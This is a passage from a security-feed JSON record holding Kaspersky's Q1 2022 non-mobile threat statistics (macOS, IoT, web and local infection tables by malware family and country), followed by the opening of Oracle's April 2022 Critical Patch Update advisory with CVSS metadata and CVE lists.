[Gimmick](<https://www.securityweek.com/chinese-cyberspies-seen-using-macos-variant-gimmick-malware>) multi-platform malware family with Windows and macOS variants that uses Google Drive to communicate with the C&amp;C server, along with the [SysJoker backdoor](<https://threatpost.com/undetected-sysjoker-backdoor-malwarewindows-linux-macos/177532/>) with versions tailored for Windows, Linux and macOS.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 13.23 \n2 | AdWare.OSX.Pirrit.j | 12.05 \n3 | Monitor.OSX.HistGrabber.b | 8.83 \n4 | AdWare.OSX.Pirrit.o | 7.53 \n5 | AdWare.OSX.Bnodlero.at | 7.41 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.06 \n7 | AdWare.OSX.Pirrit.aa | 6.75 \n8 | AdWare.OSX.Pirrit.ae | 6.07 \n9 | AdWare.OSX.Cimpli.m | 5.35 \n10 | Trojan-Downloader.OSX.Agent.h | 4.96 \n11 | AdWare.OSX.Pirrit.gen | 4.76 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Bnodlero.ax | 4.45 \n14 | AdWare.OSX.Agent.gen | 3.74 \n15 | AdWare.OSX.Agent.q | 3.37 \n16 | Backdoor.OSX.Twenbc.b | 2.84 \n17 | Trojan-Downloader.OSX.AdLoad.mc | 2.81 \n18 | Trojan-Downloader.OSX.Lador.a | 2.81 \n19 | AdWare.OSX.Bnodlero.ay | 2.81 \n20 | Backdoor.OSX.Agent.z | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nThe TOP 20 threats to users detected by Kaspersky security solutions for macOS is usually dominated by various adware apps. The top two places in the rating were taken by adware apps from the AdWare.OSX.Pirrit family, while third place was taken by a member of the Monitor.OSX.HistGrabber.b family of potentially unwanted software which sends users&#x27; browser history to its owners&#x27; servers.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231608/10-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 2.36 \n2 | Spain | 2.29 \n3 | Italy | 2.16 \n4 | Canada | 2.15 \n5 | India | 1.95 \n6 | United States | 1.90 \n7 | Russian Federation | 1.83 \n8 | United Kingdom | 1.58 \n9 | Mexico | 1.49 \n10 | Australia | 1.36 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2022, the country where the most users were attacked was France (2.36%), followed by Spain (2.29%) and Italy (2.16%). Adware from the Pirrit family was encountered most frequently out of all macOS threats in the listed countries.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol as before. Just one quarter of devices attempted to brute-force our SSH traps.\n\nTelnet | 75.28% \n---|--- \nSSH | 24.72% \n \n**_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2022_**\n\nIf we look at sessions involving Kaspersky honeypots, we see far greater Telnet dominance.\n\nTelnet | 93.16% \n---|--- \nSSH | 6.84% \n \n**_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2022_**\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.07 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26 \n3 | Backdoor.Linux.Mirai.ba | 7.95 \n4 | Backdoor.Linux.Gafgyt.a | 5.55 \n5 | Trojan-Downloader.Shell.Agent.p | 4.62 \n6 | Backdoor.Linux.Mirai.ad | 3.89 \n7 | Backdoor.Linux.Gafgyt.bj | 3.02 \n8 | Backdoor.Linux.Agent.bc | 2.76 \n9 | RiskTool.Linux.BitCoinMiner.n | 2.00 \n10 | Backdoor.Linux.Mirai.cw | 1.98 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nSimilar IoT-threat statistics [are published in the DDoS report](<https://securelist.com/ddos-attacks-in-q1-2022/105045/#attacks-on-iot-honeypots>) for Q1 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q1 2022, Kaspersky solutions blocked 1,216,350,437 attacks launched from online resources across the globe. 313,164,030 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231643/11-en-malware-report-q1-2022-pc.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 22.63 \n2 | Tunisia | 21.57 \n3 | Algeria | 16.41 \n4 | Mongolia | 16.05 \n5 | Serbia | 15.96 \n6 | Libya | 15.67 \n7 | Estonia | 14.45 \n8 | Greece | 14.37 \n9 | Nepal | 14.01 \n10 | Hong Kong | 13.85 \n11 | Yemen | 13.17 \n12 | Sudan | 13.08 \n13 | Slovenia | 12.94 \n14 | Morocco | 12.82 \n15 | Qatar | 12.78 \n16 | Croatia | 12.53 \n17 | Republic of Malawi | 12.33 \n18 | Sri Lanka | 12.28 \n19 | Bangladesh | 12.26 \n20 | Palestine | 12.23 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country or territory._\n\nOn average during the quarter, 8.18% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/27074233/13-en-malware-report-q1-2022-pc-1.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users&#x27; computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2022, our File Anti-Virus detected **58,989,058** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **%**** \n---|---|--- \n1 | Yemen | 48.38 \n2 | Turkmenistan | 47.53 \n3 | Tajikistan | 46.88 \n4 | Cuba | 45.29 \n5 | Afghanistan | 42.79 \n6 | Uzbekistan | 41.56 \n7 | Bangladesh | 41.34 \n8 | South Sudan | 39.91 \n9 | Ethiopia | 39.76 \n10 | Myanmar | 37.22 \n11 | Syria | 36.89 \n12 | Algeria | 36.02 \n13 | Burundi | 34.13 \n14 | Benin | 33.81 \n15 | Rwanda | 33.11 \n16 | Sudan | 32.90 \n17 | Tanzania | 32.39 \n18 | Kyrgyzstan | 32.26 \n19 | Venezuela | 32.00 \n20 | Iraq | 31.93 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231744/13-en-malware-report-q1-2022-pc.png>))_\n\nOverall, 15.48% of user computers globally faced at least one Malware-class local threat during Q1. Russia scored 16.88% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-27T08:00:05", "type": "securelist", "title": "IT threat evolution in Q1 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-40444", "CVE-2022-0604", "CVE-2022-0605", "CVE-2022-0606", "CVE-2022-0609", "CVE-2022-0847", "CVE-2022-1096", "CVE-2022-21836", "CVE-2022-21882", "CVE-2022-21919", "CVE-2022-22947", "CVE-2022-22965"], "modified": "2022-05-27T08:00:05", "id": "SECURELIST:11665FFD7075FB9D59316195101DE894", "href": "https://securelist.com/it-threat-evolution-in-q1-2022-non-mobile-statistics/106531/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2022-06-17T19:57:10", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 520 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2022 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2857016.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353", "CVE-2017-14159", "CVE-2017-17740", "CVE-2017-9287", "CVE-2018-1000067", "CVE-2018-1000068", "CVE-2018-1000192", "CVE-2018-1000193", "CVE-2018-1000194", "CVE-2018-1000195", "CVE-2018-11212", "CVE-2018-1285", "CVE-2018-1999001", "CVE-2018-1999002", "CVE-2018-1999003", "CVE-2018-1999004", "CVE-2018-1999005", "CVE-2018-1999007", "CVE-2018-2601", "CVE-2018-6356", "CVE-2018-8032", "CVE-2019-0227", "CVE-2019-1003049", "CVE-2019-1003050", "CVE-2019-10086", "CVE-2019-10247", "CVE-2019-10383", "CVE-2019-10384", "CVE-2019-12086", "CVE-2019-12399", "CVE-2019-12402", "CVE-2019-13038", "CVE-2019-13057", "CVE-2019-13565", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-14822", "CVE-2019-14862", "CVE-2019-16785", "CVE-2019-16786", "CVE-2019-16789", "CVE-2019-16792", "CVE-2019-17195", "CVE-2019-17571", "CVE-2019-18218", "CVE-2019-18276", "CVE-2019-19603", "CVE-2019-20388", "CVE-2019-20838", "CVE-2019-20916", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-3799", "CVE-2019-5827", "CVE-2020-10531", "CVE-2020-10543", "CVE-2020-10693", "CVE-2020-10878", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11612", "CVE-2020-11971", "CVE-2020-11979", "CVE-2020-12243", "CVE-2020-12723", "CVE-2020-13434", "CVE-2020-13435", "CVE-2020-13935", "CVE-2020-13936", "CVE-2020-13956", "CVE-2020-14155", "CVE-2020-14340", "CVE-2020-14343", "CVE-2020-15250", "CVE-2020-15358", "CVE-2020-15719", "CVE-2020-16135", "CVE-2020-17521", "CVE-2020-17527", "CVE-2020-17530", "CVE-2020-1968", "CVE-2020-1971", "CVE-2020-24616", "CVE-2020-24750", "CVE-2020-24977", "CVE-2020-25638", "CVE-2020-25649", "CVE-2020-25659", "CVE-2020-27218", "CVE-2020-28052", "CVE-2020-28196", "CVE-2020-28895", "CVE-2020-29363", "CVE-2020-29582", "CVE-2020-35198", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", "CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-36242", "CVE-2020-36518", "CVE-2020-5245", "CVE-2020-5413", "CVE-2020-5421", "CVE-2020-6950", "CVE-2020-7226", "CVE-2020-7595", "CVE-2020-7760", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8203", "CVE-2020-8231", "CVE-2020-8277", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8554", "CVE-2020-8908", "CVE-2020-9488", "CVE-2021-20231", "CVE-2021-20232", "CVE-2021-20289", "CVE-2021-21275", "CVE-2021-21290", "CVE-2021-21295", "CVE-2021-21409", "CVE-2021-21703", "CVE-2021-22096", "CVE-2021-22118", "CVE-2021-22132", "CVE-2021-22134", "CVE-2021-22144", "CVE-2021-22145", "CVE-2021-22569", "CVE-2021-22570", "CVE-2021-22696", "CVE-2021-22897", "CVE-2021-22898", "CVE-2021-22901", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-23017", "CVE-2021-23450", "CVE-2021-2351", "CVE-2021-23839", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-2427", "CVE-2021-2464", "CVE-2021-2471", "CVE-2021-25219", "CVE-2021-26291", "CVE-2021-27568", "CVE-2021-27645", "CVE-2021-27807", "CVE-2021-27906", "CVE-2021-28168", "CVE-2021-28169", "CVE-2021-28170", "CVE-2021-28657", "CVE-2021-29425", "CVE-2021-29505", "CVE-2021-29921", "CVE-2021-30129", "CVE-2021-30468", "CVE-2021-3156", "CVE-2021-31799", "CVE-2021-31810", "CVE-2021-31811", "CVE-2021-31812", "CVE-2021-3200", "CVE-2021-32066", "CVE-2021-32626", "CVE-2021-32627", "CVE-2021-32628", "CVE-2021-32672", "CVE-2021-32675", "CVE-2021-32687", "CVE-2021-32762", "CVE-2021-32785", "CVE-2021-32786", "CVE-2021-32791", "CVE-2021-32792", "CVE-2021-33037", "CVE-2021-33193", "CVE-2021-33560", "CVE-2021-33574", "CVE-2021-33813", "CVE-2021-33880", "CVE-2021-34429", "CVE-2021-3445", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-34798", "CVE-2021-35043", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3521", "CVE-2021-3537", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-35574", "CVE-2021-3572", "CVE-2021-3580", "CVE-2021-35942", "CVE-2021-36084", "CVE-2021-36085", "CVE-2021-36086", "CVE-2021-36087", "CVE-2021-36090", "CVE-2021-36160", "CVE-2021-36373", "CVE-2021-36374", "CVE-2021-3690", "CVE-2021-3711", "CVE-2021-3712", "CVE-2021-37136", "CVE-2021-37137", "CVE-2021-37714", "CVE-2021-3807", "CVE-2021-38153", "CVE-2021-39139", "CVE-2021-39140", "CVE-2021-39141", "CVE-2021-39144", "CVE-2021-39145", "CVE-2021-39146", "CVE-2021-39147", "CVE-2021-39148", "CVE-2021-39149", "CVE-2021-39150", "CVE-2021-39151", "CVE-2021-39152", "CVE-2021-39153", "CVE-2021-39154", "CVE-2021-39275", "CVE-2021-4034", "CVE-2021-40438", "CVE-2021-40690", "CVE-2021-4104", "CVE-2021-41099", "CVE-2021-41164", "CVE-2021-41165", "CVE-2021-41182", "CVE-2021-41183", "CVE-2021-41184", "CVE-2021-4160", "CVE-2021-41617", "CVE-2021-4181", "CVE-2021-4182", "CVE-2021-4183", "CVE-2021-4184", "CVE-2021-4185", "CVE-2021-41973", "CVE-2021-42013", "CVE-2021-42340", "CVE-2021-42392", "CVE-2021-42717", "CVE-2021-43395", "CVE-2021-43527", "CVE-2021-43797", "CVE-2021-43818", "CVE-2021-43859", "CVE-2021-44224", "CVE-2021-44531", "CVE-2021-44532", "CVE-2021-44533", "CVE-2021-44790", "CVE-2021-44832", "CVE-2021-45105", "CVE-2022-0391", "CVE-2022-0778", "CVE-2022-20612", "CVE-2022-20613", "CVE-2022-20614", "CVE-2022-20615", "CVE-2022-21271", "CVE-2022-21375", "CVE-2022-21384", "CVE-2022-21404", "CVE-2022-21405", "CVE-2022-21409", "CVE-2022-21410", "CVE-2022-21411", "CVE-2022-21412", "CVE-2022-21413", "CVE-2022-21414", "CVE-2022-21415", "CVE-2022-21416", "CVE-2022-21417", "CVE-2022-21418", "CVE-2022-21419", "CVE-2022-21420", "CVE-2022-21421", "CVE-2022-21422", "CVE-2022-21423", "CVE-2022-21424", "CVE-2022-21425", "CVE-2022-21426", "CVE-2022-21427", "CVE-2022-21430", "CVE-2022-21431", "CVE-2022-21434", "CVE-2022-21435", "CVE-2022-21436", "CVE-2022-21437", "CVE-2022-21438", "CVE-2022-21440", "CVE-2022-21441", "CVE-2022-21442", "CVE-2022-21443", "CVE-2022-21444", "CVE-2022-21445", "CVE-2022-21446", "CVE-2022-21447", "CVE-2022-21448", "CVE-2022-21449", "CVE-2022-21450", "CVE-2022-21451", "CVE-2022-21452", "CVE-2022-21453", "CVE-2022-21454", "CVE-2022-21457", "CVE-2022-21458", "CVE-2022-21459", "CVE-2022-21460", "CVE-2022-21461", "CVE-2022-21462", "CVE-2022-21463", "CVE-2022-21464", "CVE-2022-21465", "CVE-2022-21466", "CVE-2022-21467", "CVE-2022-21468", "CVE-2022-21469", "CVE-2022-21470", "CVE-2022-21471", "CVE-2022-21472", "CVE-2022-21473", "CVE-2022-21474", "CVE-2022-21475", "CVE-2022-21476", "CVE-2022-21477", "CVE-2022-21478", "CVE-2022-21479", "CVE-2022-21480", "CVE-2022-21481", "CVE-2022-21482", "CVE-2022-21483", "CVE-2022-21484", "CVE-2022-21485", "CVE-2022-21486", "CVE-2022-21487", "CVE-2022-21488", "CVE-2022-21489", "CVE-2022-21490", "CVE-2022-21491", "CVE-2022-21492", "CVE-2022-21493", "CVE-2022-21494", "CVE-2022-21496", "CVE-2022-21497", "CVE-2022-21498", "CVE-2022-21716", "CVE-2022-21824", "CVE-2022-22719", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-23181", "CVE-2022-23221", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23437", "CVE-2022-23852", "CVE-2022-23943", "CVE-2022-23990", "CVE-2022-24329", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25313", "CVE-2022-25314", "CVE-2022-25315"], "modified": "2022-06-16T00:00:00", "id": "ORACLE:CPUAPR2022", "href": "https://www.oracle.com/security-alerts/cpuapr2022.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}